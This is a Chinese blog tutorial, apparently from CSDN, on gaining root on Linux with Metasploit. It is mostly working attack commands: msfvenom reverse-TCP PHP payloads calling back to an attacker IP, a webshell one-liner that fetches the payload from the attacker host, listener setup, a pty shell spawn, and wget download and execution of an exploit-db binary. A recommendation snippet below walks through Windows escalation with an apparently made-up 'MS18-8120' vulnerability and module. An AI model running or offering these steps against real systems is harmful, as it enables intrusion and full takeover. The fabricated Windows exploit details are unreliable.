metasploit linux 提权(本文仅用于技术讨论与学习,利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者及本公众号不为此承担任何责任。)

1、 简介

Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。

2、 使用metasploit linux提权

1.先开启一个http服务器
python -m http.server 8090
python -m SimpleHTTPServer 8090  //这两种写法都行,一个不行就换另外一种

linux提权01

2.生成攻击载荷

​ //在kali中生成,这里面不要有中文字符,不然后面会乱码

msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.121.133 LPORT=9999 -f raw > 

msf.php  //ip和端口都是本地(kali攻击者)的,raw后面是在本地生成文件的路径 

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.121.133 lport=7777 -o MS.php

linux提权02

3.下载(有两种方法)
1.先找到tmp文件夹地址,tmp文件夹所有用户都可以写入linux提权03
2.A 浏览器利用webshell(后门一句话)下载

file_put_contents('../tmp/msf.php',file_get_contents('http://192.168.0.189//Desktop/msf.php'));
//两个都是php函数,详细查百度
file_put_contents('../tmp/msf.php', file_get_contents('http://192.168.121.133/Desktop/msf.php'), FILE_APPEND|LOCK_EX);

linux提权04

再看看tmp里面有没有msf.php

linux提权05

可以看见成功了。

2.B 或者利用反弹shell,wget下载,详细看前面的文章
4.本地监听
1.接着在本地执行msfconsole(注意不要写错)

linux07

//每行都要执行
use exploit/multi/handler 
set payload php/meterpreter_reverse_tcp 
set lhost 192.168.121.133  //kali的ip
set lport 12345 //端口和上面的对应
exploit //执行完这步就能做监听了

如图:linux提权08

然后我们执行命令,会发现不行:linux提权09

为什么呢,是因为浏览器还没访问msf.php,访问一下就行了:linux提权10

// 如果还是不行的话有可能是复制有问题,不能使用ctrl+shift+c复制

shel.php 的内容

反弹shell

http://www.moontester.com//upload/shellx.php

在metasploit设置好监听模块 访问shellx.php 就会获取一个session

5. 提权命令

getuid 查看当前用户

使用模块查询漏洞

run post/multi/recon/local_exploit_suggester

输入shell 就能使用终端命令

从[https://www.exploit-db.com/exploits/37292

这里复制c文件下来,放到kali里面进行编译:

gcc xxx.c -o exp

然后 输入shell,进行终端命令:

linux提权11

终端有些时候系统的命令终端不允许直接访问,可以使用python虚拟化一个终端来执行

python -c 'import pty;pty.spawn("/bin/bash")'`
python3 -c 'import pty;pty.spawn("/bin/bash")'

然后使用wget下载编译好的二进制文件,名为exp的文件

wget http://192.168.xxx.xxx/Desktop/exp

然后使用 chmod +x exp //给exp加入执行权限

然后输入 ./exp 执行

如果成功就会得到一个root

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MS18-8120是一个Windows提权漏洞,它可以影响Windows 7 SP1 x86和x64、Windows 8.1 x86和x64、Windows Server 2008 R2 SP1、Windows Server 2012和Windows Server 2012 R2。这个漏洞是在Windows内核中存在一个缺陷,攻击者可以利用这个缺陷来提升他们的权限,从而执行任意代码。 下面是一些利用MS18-8120漏洞进行Windows提权的步骤: 1.使用Metasploit框架:Metasploit是一个开源的渗透测试框架,它可以帮助安全专业人员快速、高效地发现和利用漏洞。在这个案例中,我们将使用Metasploit框架来利用MS18-8120漏洞。 2. 扫描目标:首先,我们需要扫描目标系统以检测是否存在漏洞。使用Nmap或其他扫描工具扫描目标IP地址,如下所示: ``` nmap -sV -O targetIP ``` 3. 打开Metasploit:打开Kali Linux操作系统并打开Metasploit框架,使用以下命令: ``` msfconsole ``` 4. 搜索漏洞利用模块:在Metasploit控制台中,使用以下命令搜索与MS18-8120漏洞相关的模块: ``` search MS18-8120 ``` 5. 选择漏洞利用模块:从搜索结果中选择一个适合我们的漏洞利用模块。在这个案例中,我们将选择“exploit/windows/local/ms18_8120_dcom”,使用以下命令: ``` use exploit/windows/local/ms18_8120_dcom ``` 6. 配置漏洞利用模块:在我们使用模块之前,我们需要配置一些参数。使用以下命令来查看可用的参数: ``` show options ``` 7. 配置目标IP地址和端口号:我们需要设置目标IP地址和端口号。使用以下命令设置目标IP地址和端口号: ``` set RHOST targetIP set RPORT targetPort ``` 8. 运行漏洞利用模块:设置完参数后,使用以下命令运行漏洞利用模块: ``` run ``` 9. 检查提权结果:漏洞利用模块运行后,我们可以检查提权结果。使用以下命令检查当前用户的权限: ``` getuid ``` 如果返回结果为“NT AUTHORITY\SYSTEM”,则说明我们已经成功提升了我们的权限。 总结: 通过使用Metasploit框架和MS18-8120漏洞利用模块,我们可以快速、高效地进行Windows提权攻击。但是请注意,任何未经授权的攻击都是非法的。只有在合法的渗透测试环境中使用这些技术

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值